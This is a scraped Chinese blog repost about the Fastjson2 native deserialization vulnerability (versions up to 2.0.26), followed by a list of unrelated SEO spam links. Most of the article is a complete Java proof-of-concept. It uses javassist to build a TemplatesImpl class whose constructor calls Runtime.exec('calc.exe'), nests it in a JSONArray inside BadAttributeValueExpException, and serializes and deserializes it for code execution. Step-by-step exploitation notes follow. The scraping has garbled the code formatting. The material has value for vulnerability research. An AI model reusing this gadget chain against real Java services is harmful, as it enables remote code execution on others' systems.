当前位置: 首页 > news >正文

外贸搜素网站河南科兴建设有限公司网站

外贸搜素网站,河南科兴建设有限公司网站,什么是网络营销道德,做期货应关注什么网站根据Y4TACKER师傅在2023-03-20发布了一篇关于Fastjson原生反序列化的文章#xff0c;文章中引入注目的是利用条件限制条件#xff0c;不常常关注漏洞预警或者内容的几乎都是未发觉Fastjson2 到Fastjson2 2.0.26版本都有问题#xff0c;其实如果单独去使用一些关键词去搜索Y4TACKER师傅在2023-03-20发布了一篇关于Fastjson原生反序列化的文章文章中引入注目的是利用条件限制条件不常常关注漏洞预警或者内容的几乎都是未发觉Fastjson2 到Fastjson2 2.0.26版本都有问题其实如果单独去使用一些关键词去搜索Fastjson2漏洞或Fastjson2 Payload的结果内容比较乱比较杂几乎参杂了Fastjson1的SEO搜索内容那么就可能在一时没注意的情况下直接滑过。 一、创建一个DEMO 设置依赖项依赖项中有个是使用的是Fastjson1.2.48的这个就不演示了主要还是以Fastjson2系列为主 project xmlnshttp://maven.apache.org/POM/4.0.0xmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexsi:schemaLocationhttp://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsdmodelVersion4.0.0/modelVersiongroupIdxibt/groupIdartifactIdcom.xibt/artifactIdversion0.0.1-SNAPSHOT/versionnameProxy/namedependenciesdependencygroupIdorg.javassist/groupIdartifactIdjavassist/artifactIdversion3.19.0-GA/version !-- 或者其他版本 --/dependency!-- https://mvnrepository.com/artifact/com.alibaba/fastjson --dependencygroupIdcom.alibaba/groupIdartifactIdfastjson/artifactIdversion1.2.48/version/dependencydependencygroupIdcom.alibaba.fastjson2/groupIdartifactIdfastjson2/artifactIdversion2.0.0/version/dependency/dependencies /project在项目中创建一个Java类上面的fastjson2依赖版本根据也可自行更改为2.0.26版本几乎都是存在问题的 package com.example.fastjson;import javax.management.BadAttributeValueExpException; import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Field;import com.alibaba.fastjson2.JSONArray; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import javassist.ClassPool; import javassist.CtClass; import javassist.CtConstructor; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;public class Test {public static void setValue(Object obj, String name, Object value) throws Exception {Field field obj.getClass().getDeclaredField(name);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {ClassPool pool ClassPool.getDefault();CtClass clazz pool.makeClass(a);CtClass superClass pool.get(AbstractTranslet.class.getName());clazz.setSuperclass(superClass);CtConstructor constructor new CtConstructor(new CtClass[]{}, clazz);// 修改这里使用 calc.exe 打开 Windows 计算器如果是mac需要自行修改constructor.setBody(Runtime.getRuntime().exec(\calc.exe\););clazz.addConstructor(constructor);byte[][] bytes new byte[][]{clazz.toBytecode()};TemplatesImpl templates TemplatesImpl.class.newInstance();setValue(templates, _bytecodes, bytes);setValue(templates, _name, y4tacker);setValue(templates, _tfactory, null);JSONArray jsonArray new JSONArray();jsonArray.add(templates);BadAttributeValueExpException val new BadAttributeValueExpException(null);Field valfield val.getClass().getDeclaredField(val);valfield.setAccessible(true);valfield.set(val, jsonArray);ByteArrayOutputStream barr new ByteArrayOutputStream();ObjectOutputStream objectOutputStream new ObjectOutputStream(barr);objectOutputStream.writeObject(val);ObjectInputStream ois new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o (Object) ois.readObject();} } 漏洞触发点 Fastjson2 在处理某些特殊的序列化数据时存在漏洞该漏洞允许攻击者通过构造恶意的JSON数据触发远程代码执行。 具体触发点在于通过JSONArray的add方法将构造的TemplatesImpl对象添加到JSONArray中。 利用方法 通过构造TemplatesImpl对象设置_bytecodes字段为经过calc.exe执行代码的字节码。 利用BadAttributeValueExpException类的漏洞通过设置其val字段为包含恶意TemplatesImpl对象的JSONArray以触发漏洞。 触发方式 触发的方式主要是通过对BadAttributeValueExpException对象的序列化和反序列化以触发Fastjson反序列化漏洞。 最终目的是在反序列化过程中执行恶意构造的TemplatesImpl对象中的代码即执行constructor.setBody(Runtime.getRuntime().exec(\calc.exe\););从而触发恶意调用。
http://www.zqtcl.cn/news/906118/

相关文章:

  • 浙江网站建设公司地址南京做电商网站的公司
  • 网上销售型的企业网站建行个人手机银行
  • 网站建设与规划方案书网站建设策划有哪些
  • 手机网站建设推广方案ppt模板单页企业官网模板
  • 荥阳网站建设多少钱长沙企业关键词优化哪家好
  • 网站购物流程模块怎么实现最新足球赛事
  • 网站建设后需要维护吗网站规划的案例
  • 北京造价员变更在哪个网站做免费域名申请入口
  • 百度免费收录提交入口seo wordpress theme
  • 公司付网站会员费科目怎么做wordpress 多站点 主题
  • 做深度的互联网站网站突然没收录了
  • 网站建设进度表下载周到的商城网站建设
  • 建设一个连接的网站服装企业网站源码
  • 什么网站源码做分类信息网站好域名备案企业网站内容
  • wordpress 文章显示数量淘宝seo优化怎么做
  • 响应式网站模块商务网站创建流程是什么
  • 关于服饰搭配做的比较好的网站网站后台管理默认密码
  • 用自己电脑配置服务器做网站响应式框架
  • 任经理++徐州网站建设湖南正规关键词优化
  • 哪些软件可以做网站设计农村网站建设茂名
  • 平顶山网站建设费用腾讯云轻量应用服务器
  • 外贸优秀网站廊坊seo建站
  • 站长工具seo综合查询5g网站建设整改落实情况
  • 网站建设方案 流程wordpress客户案例
  • 网站被收录的过程如何创造属于自己的软件
  • 做神马网站优化快速排国外乡村建设网站
  • 东莞网站优化服务公司天河做网站开发
  • ui在线设计网站滁州 来安县建设局网站
  • 做印尼购物网站如何发货wordpress怎么换中文
  • 深圳方维网站建设公司企业网站推广方式和策略